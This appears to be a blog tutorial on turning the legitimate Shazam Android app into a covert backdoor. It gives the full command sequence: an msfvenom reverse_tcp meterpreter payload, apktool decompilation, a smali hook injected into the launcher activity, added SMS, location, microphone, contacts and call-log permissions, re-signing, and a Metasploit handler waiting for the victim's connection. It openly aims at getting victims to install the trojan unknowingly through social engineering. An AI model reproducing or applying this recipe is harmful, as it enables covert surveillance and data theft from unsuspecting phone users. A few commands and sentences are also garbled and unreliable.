This article is all about planting a backdoor on an Android device, manually. While there are automated tools like AndroRat or Spade, we’re going to show you how to create a backdoor APK by hand.
The goal here is to get the backdoor APK installed on the victim’s device without them knowing. Naturally, the victim isn’t going to install an APK that doesn’t seem useful. So, the trick is to embed the backdoor in a regular, functional APK that the victim wants to install.
Imagine you’re guiding someone to install a regular app. That’s the approach you need to take.
In today’s exercise, we’ll walk through how an attacker can maliciously plant a backdoor in an APK. When the victim installs this APK and runs the app, a meterpreter session is established on the attacker’s PC through a reverse connection.
Remember, the victim must run the app for this to work.
Let’s dive in and get started!
The practice proceeds through the steps below.
Step 1. Create Payload APK file (using msfvenom)
Step 2. Download normal APK file
Step 3. Decompiling APK (Both Payload APK & Normal APK)
Step 4. Copy payload (from Payload directory to normal APK directory…)
Step 5. Register hooking (in the onCreate smali code of the activity used as LAUNCHER in the normal APK…)
Step 6. Add permissions to Manifest.xml file of normal APK
Step 7. APK recompilation
Step 8. Keysigning
1. Hands-On
The practice environment is as follows.
division | Attacker | Victim |
IP address | 192.168.0.64 | 192.168.0.14 |
OS | Kali Linux 2016.1 | Android 4.4.2 |
Tools used | Metasploitapktool (apk file compile/decompile tool)keytool (Android key generation tool)jarsigner (keysigning tool) | doesn’t exist |
Step 1. Create Payload APK file
Create a meterpreter payload by running the command below in the directory you want to work in.
My working directory is ~/Hack/Android.
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.64 LPORT=4444 -o meterpreter.apk
-p : payload settings option
-o: Specifies the file name to be created
The meterpreter payload apk file was created successfully with the name meterpreter.apk.
However, since it is a payload created simply with msfvenom without encoding or obfuscation, it cannot be detected by an AV (AntiVirus) program.
It’s possible.
Step 2. Download the normal APK file
You need a normal apk file that will hide the meterpreter backdoor payload created in Step 1.
Find a site where you can download the apk file through Google.
Usually, if you search for “apk file name you are looking for, apk download,” several sites will appear, so you can easily download them.
Personally, I searched for and downloaded Shazam 6.4.0 from a site called apkmirror .
(For reference, I initially downloaded it from a site called apkpure, but errors kept occurring when I decompiled it with apktool, possibly because the apk file was abnormal.)
shazam is a free music streaming app.
I moved the downloaded shazam 6.4.0 apk file (com.shazam.android_6.4.0-160415-604002_minAPI16….(nodpi).apk) to the directory I want to work in using the mv command .
Because the file name was long, I renamed it to shazam_6.4.0.apk.
The file was moved normally as shown in the screenshot below.
Step 3. Decompile APK
Now shazam_6.4.0. apk file and meterpreter. Decompile the apk file using apktool .
The tool used at this time is apktool, and apktool is installed by default in Kali Linux.
# apktool d -f -o original shazam_6.4.0.apk
# apktool d -f -o payload meterpreter.apk
The apktool I used is v2.2.1-dirty as you can see below. Please take your time to look at your options.
Then, let’s decompile the two apk files.
Decompilation completed successfully. New original and payload directories have been created as shown below .
Step 4. Copy payload
Using the command below, copy the entire metasploit directory in the directory where the meterpreter.apk file was decompiled ( payload /smali/com/ ) to the directory under the directory where the normal apk file was decompiled ( original /smali/com/ ).
# cp -r payload/smali/com/metasploit/original/smali/com
As you can see, a metasploit directory has been created.
There is a directory called stage in the metasploit directory, and in that directory there are files like the screenshot below.
The file used in this exercise is Payload.smali, boxed in red .
MainBroadcastReceiver.smali and MainService.smali files are run in the background through services when Android device boots.
It is used to implement a backdoor that runs automatically , and we will discuss related details in the next post.
Step 5. Register hooking
Using your favorite text editor, open the AndroidManifest.xml file in the directory where the normal apk file (shazam) was decompiled and find the path and name of the activity to hook.
# gedit original/AndroidManifest.xml
Use the search function to find the text .MAIN or .LAUNCHER to ensure that the backdoor is executed when the app is launched .
The underlined part in the screenshot below. That is, the activity ( com.shazam.android.activities.SplashActivity ) set in <activity android:name= is the activity to be hooked.
Now, replace the Dot ( .) in the found com.shazam.android.activities.SplashActivity with Slash (/), add the .smali extension , and open the activity file using a text editor . # gedit original/smali/ com/shazam/android/activities/SplashActivity.smali
When the activity small code opens, it searches for the following text:
;->onCreate(Landroid/os/Bundle;)V
The line immediately following that line is where we will register our hook.
Add the text below here and save.
At this time, please be careful as you must add the path according to the path used in Step 4 . (The red text is the payload file copied in Step 4.)
invoke-static {p0}, L com/metasploit/stage/Payload ;->start(Landroid/content/Context;)V
Step 6. Add permissions
Open the AndroidManifest.xml file in the directory where the healthy apk file was decompiled and add the desired permissions.
# gedit original/AndroidManifest.xml
At this time, check for duplicates with the originally added permissions to prevent duplicate registration.
The newly added permissions I added are as follows.
If you want to see more types of permissions, you can check it on the Android developer site .
Permissions registered in the AndroidManifest .xml file are displayed when the user installs the apk file.
The average user does not even read the permissions displayed at this time. Because I hate troublesome things~
<uses-permission android:name=”android.permission.ACCESS_FINE_LOCATION”/>
<uses-permission android:name=”android.permission.ACCESS_COARSE_LOCATION”/>
<uses-permission android:name=”android.permission.CHANGE_WIFI_STATE”/ >
<uses-permission android:name=”android.permission.ACCESS_COURSE_LOCATION”/>
<uses-permission android:name=”android.permission.READ_SMS”/>
<uses-permission android:name=”android.permission.WRITE_SMS” />
<uses-permission android:name=”android.permission.SEND_SMS”/> <
uses-permission android:name=”android.permission.RECEIVE_SMS”/>
<uses-permission android:name=”android.permission.RECORD_AUDIO “/>
<uses-permission android:name=”android.permission.CALL_PHONE”/>
<uses-permission android:name=”android.permission.READ_CALL_LOG”/>
<uses-permission android:name=”android.permission. READ_CONTACTS”/>
Permissions have been added as shown in the screenshot below. Once you have added permissions, simply save and close the file.
Step 7. Recompile APK
Now that the backdoor has been planted, you need to recompile it into an apk file. Also use apktool. Run the command below.
# apktool b original/
As shown in the screenshot below, when recompilation is completed successfully, a new dist directory is created under the original directory, and a new apk file is created in that directory.
At this time, I had some trouble with the following error.
Invalid register: v17. Must be between v0 and v15, inclusive.
Only registers from v0 to v15 should be used, but this error occurs because registers exceeding these are used. This is assumed to occur when a value exceeding 15 is assigned to the variable called .locals in the smali code of the activity to be registered for hooking in step 3. It’s possible. A fundamental solution has not been found yet, and there are cases where errors do not occur if you download and work with an older version of the normal apk file.
Step 8. Keysigning
The apk file must be keysigned to be installed on an Android device.
Therefore, you must first create a keystore to keysign the newly compiled apk file (omit it if it already exists!).
You can create it through Eclipse, but here we will create it using a tool called keytool.
To create a keystore using the keytool tool, follow the steps below. # keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -validity 9999 -keystore: Keystore name, set to debug.keystore.
-storepass: Keystore password, set to android
-alias: Keystore alias, set to androiddebugkey
-keypass: Key password , set to android
-validity: Validity period, set to 9999
Once you have created a keystore, keysign it using the jarsigner tool.
Please note that when executing the command below, you must enter the value you set when creating the keystore .
# jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg SHA1withDSA [apk file name] androiddebugkey
All work is done.
Now, the victim is made to install and run the apk file on his Android device using social engineering techniques or any other method.
All you have to do is use Metasploit on the attacker’s PC (Kali Linux) and wait for the victim’s Reverse Connection.
msf > use multi/handler
msf exploit( handler ) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit( handler ) > set lhost 192.168.0.64
lhost => 192.168.0.64
msf exploit( handler ) > set lport 4444
lport => 4444
msf exploit( handler ) > exploit
If the victim installs and runs the apk file, he or she will get a Meterpreter session as shown in the screenshot below.
In my case, the session was intermittently disconnected even though the app was running normally on the victim device.
<End>